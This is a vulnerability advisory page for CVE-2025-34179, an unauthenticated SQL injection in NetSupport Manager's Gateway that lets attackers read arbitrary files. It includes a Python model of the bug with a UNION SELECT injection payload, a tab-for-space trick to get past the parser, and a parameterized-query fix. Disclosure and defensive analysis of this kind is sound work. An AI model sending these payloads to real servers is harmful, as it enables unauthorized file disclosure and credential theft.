VYPR
High severity · NVD Advisory · Published Dec 15, 2025 · Updated Apr 15, 2026

CVE-2025-34179

Description

NetSupport Manager < 14.12.0001 contains an unauthenticated SQL injection vulnerability in its Connectivity Server/Gateway HTTPS request handling. The server evaluates request URIs using an unsanitized SQLite query against the FileLinks table in gateway.db. By injecting SQL through the LinkName/URI value, a remote attacker can control the FileName field used by the server to read and return files from disk, resulting in arbitrary local file disclosure.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

NetSupport Manager < 14.12.0001 has an unauthenticated SQL injection in the Gateway server, allowing remote attackers to read arbitrary files from the local filesystem.

Vulnerability

Overview

NetSupport Manager versions prior to 14.12.0001 contain an unauthenticated SQL injection vulnerability in the Connectivity Server (Gateway) component. The server processes each incoming HTTPS request by constructing an unsanitized SQLite query against the FileLinks table in gateway.db. The URI path is concatenated directly into the query text, allowing an attacker to inject arbitrary SQL [1][2].

Exploitation

An attacker can send a crafted HTTP request to the Gateway server (typically exposed on TCP/443) without any authentication. By injecting SQL through the LinkName/URI value, the attacker controls the FileName value the query returns. The server then reads the file at that attacker-chosen path from disk and returns its contents in the HTTP response. The researcher notes that spaces in the injected URI must be replaced with tabs so that the request still passes the server's simple request-line parsing; SQLite treats a tab as ordinary whitespace, so the injected statement is unaffected [2].
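The chain described above, modelled end to end as an added Python example. This is not NetSupport's code: only the gateway.db table and column names (FileLinks, LinkName, FileName) come from the advisory; the exact query text, the table schema, the sample rows, the naive request-line parser and the disclosed target path are all assumptions made for illustration. The example shows why the same UNION payload is dropped when it contains spaces but reaches SQLite when it contains tabs, and how a parameterized query stops it:

```python
import sqlite3

# Constructed stand-in for the FileLinks table in gateway.db. The table and
# column names come from the advisory; the schema and rows are assumptions.
def build_gateway_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE FileLinks (LinkName TEXT, FileName TEXT)")
    conn.execute(
        "INSERT INTO FileLinks VALUES (?, ?)",
        ("/files/client.exe", r"C:\Program Files\NetSupport\Gateway\files\client.exe"),
    )
    return conn


def naive_request_target(request_line):
    """Model of a request-line parser that splits on spaces only.

    Assumed, not taken from the product: it is the simplest parser for which
    the researcher's 'replace spaces with tabs' note makes sense.
    """
    parts = request_line.split(" ")
    if len(parts) != 3 or parts[2] != "HTTP/1.1":
        return None  # malformed request line, request dropped
    return parts[1]


def lookup_vulnerable(conn, uri):
    """Assumed shape of the unsanitized lookup: the URI is concatenated into
    the SQL text, so a quote in it changes the statement."""
    sql = "SELECT FileName FROM FileLinks WHERE LinkName = '" + uri + "'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def lookup_fixed(conn, uri):
    """Parameterized lookup: the URI is bound as a value and cannot alter
    the statement, whatever characters it contains."""
    row = conn.execute(
        "SELECT FileName FROM FileLinks WHERE LinkName = ?", (uri,)
    ).fetchone()
    return row[0] if row else None


# Placeholder path the attacker wants the Gateway to read and return.
TARGET = r"C:\Windows\win.ini"


def injected_uri(whitespace):
    """Close the string literal, UNION in an attacker-chosen FileName, and
    comment out the trailing quote. `whitespace` is ' ' or '\\t'."""
    return "'" + whitespace.join(["", "UNION", "SELECT", "'" + TARGET + "'--"])


def run_attack(conn, whitespace):
    """Drive the modelled request pipeline and return the FileName the
    vulnerable handler would read from disk (None if the request is dropped)."""
    request_line = "GET " + injected_uri(whitespace) + " HTTP/1.1"
    target = naive_request_target(request_line)
    if target is None:
        return None
    return lookup_vulnerable(conn, target)


def demo():
    conn = build_gateway_db()
    tab_target = naive_request_target("GET " + injected_uri("\t") + " HTTP/1.1")
    return {
        "legit": lookup_vulnerable(conn, "/files/client.exe"),
        "spaces": run_attack(conn, " "),   # parser sees too many fields: dropped
        "tabs": run_attack(conn, "\t"),    # tabs survive the split; SQLite runs the UNION
        "fixed": lookup_fixed(conn, tab_target),  # same payload, parameterized query
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:>6}: {value!r}")
```

The "tabs" entry is the attacker-chosen path coming back as FileName, which is exactly the value the real server hands to its file-read routine; the "fixed" entry is None because the bound parameter is compared as data, not parsed as SQL.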

Impact

Successful exploitation leads to arbitrary local file disclosure. The attacker can read any file the Gateway process can access, potentially exposing sensitive data such as configuration files, credentials, or other system information. Additionally, the same injection can be used to write attacker-controlled SQLite database files to disk, which under specific circumstances (e.g., a PHP-enabled web server on the same host) could lead to remote code execution [2].

Mitigation

NetSupport has released version 14.12.0001 which fixes this vulnerability. Users are advised to update all Gateway, Control, and Client components to the latest version. For those running older versions (12.70–12.80 or 14.00–14.10), specific patches (12.80.0017 and 14.10.0007) are available [1]. The vulnerability was reported by researcher Chris Leech and coordinated through VulnCheck [2][3].

AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Patches (0)

No patches discovered yet.

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References (3)

News mentions (0)

No linked articles in our index yet.